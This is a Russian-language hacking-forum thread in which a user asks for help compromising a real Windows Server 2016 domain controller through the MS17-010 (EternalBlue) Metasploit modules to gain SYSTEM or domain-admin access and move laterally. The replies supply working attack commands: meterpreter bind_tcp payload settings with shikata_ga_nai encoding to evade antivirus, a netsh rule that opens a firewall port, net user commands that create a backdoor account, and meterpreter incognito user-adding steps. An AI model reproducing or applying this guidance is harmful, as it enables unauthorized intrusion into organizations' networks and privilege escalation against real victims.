• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc Проблема в MS17-010. Не выполняются команды

Отслеживать
sect adept

sect adept

(L3) cache
Пользователь
Регистрация
19.02.2022
Сообщения
280
Решения
3
Реакции
73
Всем привет, господа форумчане

Таргет: Domain Controller Windows Server 2016 Standart 14393. На борту стоит АВ 360
Цель: Получить шелл с системными правами или получить домен админа и добавить его в RDP группу

Суть проблемы:
Юзаю мету, в ней использую эксп admin/smb/ms17_010_command Сообственно проблема в том, что некоторые команды не хотят выполняться. Например хочу добавить своего юзера командой set command "net user username password /add", эксп пишет, что все ок выполнилось, но вывод почему-то пустой. Далее проверяю командой set command "net users", а моего юзера нет)
1673768575452.png

Думаю, что пароль под политику не подходит, но вроде задал максимально сложный.
1673768943292.png

1673769284099.png

На скрине видно, что моего юзера test11 нет. Хотя синтаксис команды верен, сообщается что все выполнено успешно.

Подозреваю то, что АВ 360 мешает добавлять юзера, но вроде бы раньше с таким не сталкивался. Пытался его потушить через taskkill /PID *pid* /F он не убивается.

Пробовал существующего юзера добавить в группу локальных админов и в RDP группу, все так же без успешно. Говорится все выполнено успешно, по факту пусто.

Так же пробовал запустить батник с командами создания юзера и добавления в группы со своей шары, еще пробовал скопировать этот батник на таргет - безуспешно.

Через echo net user... > test.bat пробовал записаться на таргет, чтобы потом запустить - опять же безуспешно.

Пытался сграбить NTDS все так же через этот эксп - как всегда безуспешно.

На руках есть доменная учетка, которая есть на таргете, но по RDP не могу зайти, потому что юзера нет в соответствующей группе, и эта учетка не админская.

Мне необходимо получить шелл с системными правами или учетку админа на таргете и в RDP группе для дальнейшего продвижения по сети.

Может подскажите, пожалуйста, какой-либо MS17 не в мете, а питоновский и рабочий? Или вектор атаки для достижения моей цели, в голову уже ничего не лезет...

Всем заранее спасибо :)
 

Вложения

  • 1673769157513.png
    1673769157513.png
    30.9 КБ · Просмотры: 22
Сортировать по дате Сортировать по голосам
пароль ты пробуешь действительно сложный, но в нем спецсимволов много, возможно из-за них ломается команда.
если отрабатывает ms17_010_command, значит pip_name найден и вполне можешь использовать ms17_010_psexec с энкодерами и пейлоудом windows/meterpreter/bind_tcp
еще стоит поставить set EXITFUNC process
Код: 
set payload windows/meterpreter/bind_tcp
set exitfunc process
set EnableContextEncoding true
set EnableStageEncoding true
set StageEncoder encoder/x86/shikata_ga_nai
 
Последнее редактирование:
За 0 Против
3ToN сказал(а):
пароль ты пробуешь действительно сложный, но в нем спецсимволов много, возможно из-за них ломается команда.
если отрабатывает ms17_010_command, значит pip_name найден и вполне можешь использовать ms17_010_psexec с энкодерами и пейлоудом windows/metrpreter/bind_tcp
еще стоит поставить set EXITFUNC process
Попробую и отпишу результат
 
За 0 Против
3ToN сказал(а):
пароль ты пробуешь действительно сложный, но в нем спецсимволов много, возможно из-за них ломается команда.
если отрабатывает ms17_010_command, значит pip_name найден и вполне можешь использовать ms17_010_psexec с энкодерами и пейлоудом windows/meterpreter/bind_tcp
еще стоит поставить set EXITFUNC process
Код: 
set payload windows/meterpreter/bind_tcp
set exitfunc process
set EnableContextEncoding true
set EnableStageEncoding true
set StageEncoder encoder/x86/shikata_ga_nai
Попробовал убрать спецсимволы и поставить !!! - все равно не создает.
Далее попробовал ms_010_psexec. Выводит следующее:
Код: 
[*] Started bind TCP handler against 10.21.x.x:4444
[*] Exploit completed, but no session was created.

Может дело реально в АВ 360? Но как я тогда пробил экспом? А команды некоторые не выполняются...
 
За 0 Против
возможно действительно АВ мешает получить сессию и выполнить команду.
как вариант, можно попробовать из эксплойта создавать юзера в отдельном окне cmd
Код: 
set command "cmd /c net user username password /add"
 
За 0 Против
3ToN сказал(а):
возможно действительно АВ мешает получить сессию и выполнить команду.
как вариант, можно попробовать из эксплойта создавать юзера в отдельном окне cmd
Код: 
set command "cmd /c net user username password /add"
Та же беда... Походу АВ мешает действительно
 
За 0 Против
для bind_tcp стоит другой порт попробовать, все знают наизусть что 4444 - это метасплойт.
поставь, к примеру, порт 3385
и предварительно в фаерволе открыть его через ms17_010_command
Код: 
set command "netsh advfirewall firewall add rule name="B" dir=in protocol=TCP localport=3385 action=allow"
 
За 0 Против
3ToN сказал(а):
для bind_tcp стоит другой порт попробовать, все знают наизусть что 4444 - это метасплойт.
поставь, к примеру, порт 3385
и предварительно в фаерволе открыть его через ms17_010_command
Код: 
set command "netsh advfirewall firewall add rule name="B" dir=in protocol=TCP localport=3385 action=allow"
Не-а, не хочет сессию получать. Exploit completed, but no session... Реально АВ агрится. Может быть есть какой-то способ закинуть свой батник например с командами и запустить?
 
За 0 Против
3ToN сказал(а):
для bind_tcp стоит другой порт попробовать, все знают наизусть что 4444 - это метасплойт.
поставь, к примеру, порт 3385
и предварительно в фаерволе открыть его через ms17_010_command
Код: 
set command "netsh advfirewall firewall add rule name="B" dir=in protocol=TCP localport=3385 action=allow"

Сейчас вообще стал сыпаться с ошибкой
1673778297179.png
 
За 0 Против
За 0 Против
3ToN сказал(а):
скорее всего из-за кавычек в команде, пробовать в одинарные
Да, скорее всего из-за кавычек. Вы правы. Однако обидно будет забить на уязвимый контроллер из-за того, что либо я кривой, либо под капотом как-то не так обрабатывается
 
За 0 Против
3ToN сказал(а):
скорее всего из-за кавычек в команде, пробовать в одинарные
У меня получилось подключиться к SMB через smbclient.py из Impacket. Какой вектор атаки есть? Вижу только вариант попробовать закинуть свой файл и запустить потом через ms17_010_command
 
За 0 Против
Через метер попробуй использовать модуль incognito
load incognito
add_user имя пароль
add_localgroup_user группа имя
Если по рдп будешь потом заходить, и не будет пускать, добавься в группу rdp
 
За 0 Против
kamzzzzz сказал(а):
Через метер попробуй использовать модуль incognito
load incognito
add_user имя пароль
add_localgroup_user группа имя
Если по рдп будешь потом заходить, и не будет пускать, добавься в группу rdp
так сначала нужно сессию ведь получить, а у него не получается ни реверс ни бинд
 
За 0 Против
3ToN сказал(а):
так сначала нужно сессию ведь получить, а у него не получается ни реверс ни бинд
А блин, сорри туплю, я думал он с сессии зает через шел добавления юзера, перечитал. Сначала не понял, а потом как понял)))
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх